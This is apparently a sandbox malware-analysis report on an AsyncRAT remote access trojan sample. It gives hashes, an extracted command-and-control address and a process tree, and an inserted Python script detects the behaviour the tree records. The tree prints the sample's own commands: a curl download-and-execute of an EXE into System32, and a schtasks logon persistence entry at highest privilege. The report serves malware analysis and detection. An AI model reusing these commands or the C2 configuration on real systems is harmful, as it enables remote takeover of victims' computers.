Analysis

  • max time kernel
    140s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    20/06/2024, 04:13

General

  • Target

    usermode.exe

  • Size

    571KB

  • MD5

    6ff532b8468ad647aea71708cdf259ff

  • SHA1

    8bf56f629e2c32153ba5037bf981dec868f41ce8

  • SHA256

    7cbd57fe2ffbaa6da63c865cce81eaf33c083e0b23d69cde51ada9f91f309a99

  • SHA512

    4c828064856d29a6530a7b633f4772190ef5d5dd92909ae78610c9319ac9d0f5388e8a15515a824109576d31522d89e06ed88dd1f8e52a8ea058c6e345ea852b

  • SSDEEP

    12288:rWYUNQEMuGIbS2McEqE1CMSD9Opbd0xEY8Q3:pUNiufScEf0H9OpqxL

Score
10/10

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

hmnms.duckdns.org:2035

Mutex

gr4g4guhuhuie3hfgggtttu3hf33efffrfrgrgrg3f

Attributes
  • delay

    1

  • install

    true

  • install_file

    Update.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Async RAT payload 1 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution. Here the dropped boot_cnfg_x32.exe registers a task named "Update" that runs C:\Users\Admin\AppData\Roaming\Update.exe at logon with /rl highest, matching the extracted install_folder (%AppData%) and install_file (Update.exe).

  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\usermode.exe
    "C:\Users\Admin\AppData\Local\Temp\usermode.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:856
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe >nul 2>&1 && C:\\Windows\\System32\\boot_cnfg_x32.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4016
      • C:\Windows\system32\curl.exe
        curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe
        3⤵
        • Drops file in System32 directory
        PID:4412
      • C:\Windows\System32\boot_cnfg_x32.exe
        C:\\Windows\\System32\\boot_cnfg_x32.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4500
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2716
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"'
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4472
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE62A.tmp.bat""
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4560
          • C:\Windows\system32\timeout.exe
            timeout 3
            5⤵
            • Delays execution with timeout.exe
            PID:944
          • C:\Users\Admin\AppData\Roaming\Update.exe
            "C:\Users\Admin\AppData\Roaming\Update.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:4576
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:884
      • C:\Windows\system32\certutil.exe
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5
        3⤵
        PID:5008
      • C:\Windows\system32\find.exe
        find /i /v "md5"
        3⤵
        PID:1224
      • C:\Windows\system32\find.exe
        find /i /v "certutil"
        3⤵
        PID:3536
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4352,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=4084 /prefetch:8
    1⤵
    PID:2636
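The tree above is a compact install chain: curl fetches a PE from raw.githubusercontent.com straight into System32 (which only works because the sample ran as Admin), the dropped file is executed, it registers a logon task with /rl highest pointing at the AppData copy, and a batch file in Temp calls timeout before launching that copy. The block below is an added example, not part of the sandbox report or any vendor's rule set: it rebuilds the process-creation events from the command lines in the tree as constructed records and runs four behavioural rules over them, correlating each hit back to the root of its process chain (usermode.exe, PID 856). The ProcEvent layout, the rule names and the "user-writable path" heuristic are this example's own assumptions.

```python
"""Behavioural detection over the process tree in this report (added example).

Events are constructed from the command lines in the report (Sysmon-style
pid, ppid, image, command line); field and rule names are this example's own.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    root_pid: int  # top of the process chain the flagged event belongs to
    detail: str


# Constructed from the report's process tree; the msedge command line is truncated.
EVENTS = [
    ProcEvent(856, 1, r"C:\Users\Admin\AppData\Local\Temp\usermode.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\usermode.exe"'),
    ProcEvent(4016, 856, r"C:\Windows\system32\cmd.exe",
              r"C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe >nul 2>&1 && C:\\Windows\\System32\\boot_cnfg_x32.exe"),
    ProcEvent(4412, 4016, r"C:\Windows\system32\curl.exe",
              r"curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe"),
    ProcEvent(4500, 4016, r"C:\Windows\System32\boot_cnfg_x32.exe", r"C:\\Windows\\System32\\boot_cnfg_x32.exe"),
    ProcEvent(2716, 4500, r"C:\Windows\System32\cmd.exe",
              r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"' & exit'''),
    ProcEvent(4472, 2716, r"C:\Windows\system32\schtasks.exe",
              r"""schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"'"""),
    ProcEvent(4560, 4500, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE62A.tmp.bat""'),
    ProcEvent(944, 4560, r"C:\Windows\system32\timeout.exe", "timeout 3"),
    ProcEvent(4576, 4560, r"C:\Users\Admin\AppData\Roaming\Update.exe",
              r'"C:\Users\Admin\AppData\Roaming\Update.exe"'),
    ProcEvent(884, 856, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"'),
    ProcEvent(5008, 884, r"C:\Windows\system32\certutil.exe",
              r'certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5'),
    ProcEvent(2636, 1, r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
              r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility'),
]

_SYS32 = re.compile(r"\\windows\\system32\\")
_USER_WRITABLE = re.compile(r"\\(appdata|temp|programdata)\\")  # heuristic, example's own


def _norm(path: str) -> str:
    """Lower-case and collapse the doubled backslashes seen in the report's command lines."""
    return path.strip("'\"").replace("\\\\", "\\").lower()


def _basename(path: str) -> str:
    return _norm(path).rsplit("\\", 1)[-1]


def download_target(ev: ProcEvent) -> Optional[str]:
    """Normalised output path of a curl download, or None if the event is not one."""
    if _basename(ev.image) != "curl.exe":
        return None
    m = re.search(r'(?:--output|-o)\s+"?([^\s"]+)', ev.cmdline, re.I)
    return _norm(m.group(1)) if m else None


def rule_schtasks(ev: ProcEvent) -> Optional[str]:
    """schtasks /create with a logon/boot trigger whose action lives in a user-writable path."""
    if _basename(ev.image) != "schtasks.exe":
        return None
    c = ev.cmdline.lower()
    if "/create" not in c or not re.search(r"/sc\s+on(logon|start)", c):
        return None
    m = re.search(r"/tr\s+['\"]*([^'\"]+)", c)
    target = _norm(m.group(1)) if m else ""
    if not _USER_WRITABLE.search(target):
        return None
    level = "highest" if re.search(r"/rl\s+highest", c) else "limited"
    return f"logon task -> {target} (run level {level})"


def rule_delayed_batch(ev: ProcEvent, children: List[ProcEvent]) -> Optional[str]:
    """cmd.exe running a .bat from a user-writable path that calls timeout, then an EXE there."""
    if _basename(ev.image) != "cmd.exe":
        return None
    m = re.search(r'([^\s"]+\.bat)', ev.cmdline, re.I)
    if not m or not _USER_WRITABLE.search(_norm(m.group(1))):
        return None
    names = [_basename(c.image) for c in children]
    launched = [c for c in children if _USER_WRITABLE.search(_norm(c.image))]
    if "timeout.exe" in names and launched:
        return f"{_basename(m.group(1))} delays then runs {_norm(launched[0].image)}"
    return None


def detect(events: List[ProcEvent]) -> List[Finding]:
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    kids: Dict[int, List[ProcEvent]] = {}
    for e in events:
        kids.setdefault(e.ppid, []).append(e)

    def root_of(pid: int) -> int:  # walk ppid links until the parent is unknown
        while pid in by_pid and by_pid[pid].ppid in by_pid:
            pid = by_pid[pid].ppid
        return pid

    findings: List[Finding] = []
    targets: Dict[str, int] = {}  # downloaded path -> pid of the downloader
    for e in events:
        t = download_target(e)
        if t:
            targets[t] = e.pid
            if _SYS32.search(t):
                findings.append(Finding("download_to_system32", e.pid, root_of(e.pid), t))
    for e in events:
        img = _norm(e.image)
        if img in targets and e.pid != targets[img]:  # later execution of what curl wrote
            findings.append(Finding("executes_downloaded_file", e.pid, root_of(e.pid), img))
        if (d := rule_schtasks(e)):
            findings.append(Finding("schtasks_logon_persistence", e.pid, root_of(e.pid), d))
        if (d := rule_delayed_batch(e, kids.get(e.pid, []))):
            findings.append(Finding("delayed_launch_from_temp_bat", e.pid, root_of(e.pid), d))
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"[{f.rule}] pid={f.pid} root={f.root_pid}: {f.detail}")
```

Run stand-alone it reports four hits, all rooted at PID 856; the certutil hash check (PIDs 884/5008) and the unrelated msedge utility process stay quiet, which is the point of keying on the download-then-execute and task-into-AppData correlations rather than on any single LOLBin name.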

Network

MITRE ATT&CK Enterprise v15
Downloads

  • C:\Users\Admin\AppData\Local\Temp\tmpE62A.tmp.bat

    Filesize

    150B

    MD5

    2c8bc37b47cf08664a78ebbffd76d23b

    SHA1

    49e2f3d19a7b9edd662b9763ae47629496ca4758

    SHA256

    8a0da6a175df4c5ab306e7a27093f37aa60ef6f86f5e50d2b5c49fe991fad73a

    SHA512

    b81d18a37f816146daf286018ae6eea6ef888abb817d3db62d0552b7214494c5d2fd9a352176c84811a04581e3660da5c17a48aed696cd8feaaf0ee32f179648

  • C:\Windows\System32\boot_cnfg_x32.exe

    Filesize

    48KB

    MD5

    8f601efcbf3eb183bbd6500296b9ccd2

    SHA1

    2542d3fe0e97fa969c0ef8e86676ba1c72e6e846

    SHA256

    5e4a8ebbeb1b7288087c65c0f5edf6d6016528f2bf5104cfc7fd5b315bf1affd

    SHA512

    d101aa1cc4281e29813aaa269b26d9e500a0ee042024273a636fc06d59d4af30d04d1670a58e54d3263cb6dfe9b67c71ef58c4175628841f2c8719260f548d08

  • memory/4500-4-0x00007FFA041D3000-0x00007FFA041D5000-memory.dmp

    Filesize

    8KB

  • memory/4500-5-0x00000000009F0000-0x0000000000A02000-memory.dmp

    Filesize

    72KB

  • memory/4500-6-0x00007FFA041D0000-0x00007FFA04C91000-memory.dmp

    Filesize

    10.8MB

  • memory/4500-11-0x00007FFA041D0000-0x00007FFA04C91000-memory.dmp

    Filesize

    10.8MB